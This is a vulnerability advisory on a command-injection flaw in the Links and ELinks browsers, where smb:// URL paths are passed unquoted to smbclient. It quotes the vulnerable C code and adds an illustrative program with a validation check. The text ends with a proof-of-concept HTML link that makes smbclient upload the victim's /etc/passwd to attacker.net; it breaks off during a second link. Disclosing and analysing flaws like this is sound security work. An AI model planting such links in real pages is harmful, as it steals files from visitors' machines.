Links ELinks SMBClient Remote Command Execution Vulnerability

2006-11-26T00:00:00
ID SSV:569
Type seebug
Reporter Root
Modified 2006-11-26T00:00:00

Description

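Links and ELinks are web browsers.

Links and ELinks contain a flaw that allows a malicious web site to execute smbclient commands on the target machine. The flaw can lead to arbitrary files being read from the target system, or to malicious files being uploaded to the target system and executed.

The problematic code is as follows: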

smb_func() in smb.c:

    ...
    if (share) {
        if (!dir || dir[strlen(dir) - 1] == '/' || dir[strlen(dir) - 1] == '\\') {
            if (dir) {
                v[n++] = "-D";
                v[n++] = dir;
            }
            v[n++] = "-c";
            v[n++] = "ls";
        } else {
            unsigned char *ss;
            unsigned char *s = stracpy("get \"");

            /* 'dir' is the directory part of the smb://.. url;
             * it is appended without any quoting or validation */
            add_to_strn(&s, dir);
            add_to_strn(&s, "\" -");
            while ((ss = strchr(s, '/'))) *ss = '\\';
            v[n++] = "-c";
            v[n++] = s;
        }
    }
    v[n++] = NULL;

    /* smbclient is executed: */
    execvp("smbclient", (char **)v);
    fprintf(stderr, "smbclient not found in $PATH");
    _exit(1);
    ...

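A remote attacker can exploit the vulnerability to read or execute arbitrary files.

Attack prerequisites

The attacker must build a malicious page and lure the user into visiting it.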
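The following added example (not code from Links, ELinks or the advisory) reproduces the string construction from the excerpt above and shows how a double quote and semicolons in the URL path turn one `get` into several smbclient commands, next to a validation step that rejects such paths. The helper names, the sample paths and the choice of rejected characters are assumptions made for illustration; this is not the vendor's fix.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same construction as the smb.c excerpt: dir is pasted unchecked into get "...". */
char *build_get_unchecked(const char *dir)
{
    size_t len = strlen(dir) + sizeof("get \"\" -");
    char *s = malloc(len), *p;
    if (!s) return NULL;
    snprintf(s, len, "get \"%s\" -", dir);
    for (p = s; (p = strchr(p, '/')); ) *p = '\\';
    return s;
}

/* Added check (hypothetical helper): refuse any path that could close the
 * quoted argument or start another ';'-separated smbclient command. */
int smb_path_is_safe(const char *dir)
{
    const unsigned char *p;
    for (p = (const unsigned char *)dir; *p; p++)
        if (*p == '"' || *p == ';' || *p < 0x20 || *p == 0x7f)
            return 0;
    return 1;
}

/* Hardened builder: returns NULL instead of a -c string for unsafe input. */
char *build_get_checked(const char *dir)
{
    return smb_path_is_safe(dir) ? build_get_unchecked(dir) : NULL;
}

/* Number of commands in a ';'-separated smbclient -c string. */
int count_commands(const char *cmd)
{
    int n = 1;
    for (; *cmd; cmd++) if (*cmd == ';') n++;
    return n;
}

int main(void)
{
    const char *ok = "docs/report.txt";                 /* constructed input */
    const char *bad = "work/XXX\" YYY; lcd ..; exit; "; /* constructed, same shape as the page's link */
    char *a = build_get_unchecked(ok), *b = build_get_unchecked(bad);
    printf("%s -> %d command(s)\n", a, count_commands(a));
    printf("%s -> %d command(s)\n", b, count_commands(b));
    printf("checked builder accepts it: %s\n", build_get_checked(bad) ? "yes" : "no");
    free(a); free(b);
    return 0;
}
```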

RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux AS 4
RedHat Desktop 4.0
Links Links 1.00pre12
ELinks ELinks 0.11.1

http://links.sourceforge.net/

    <html>
    <a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd
    etc; put passwd ; exit; '>Put /etc/passwd</a>
    <a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd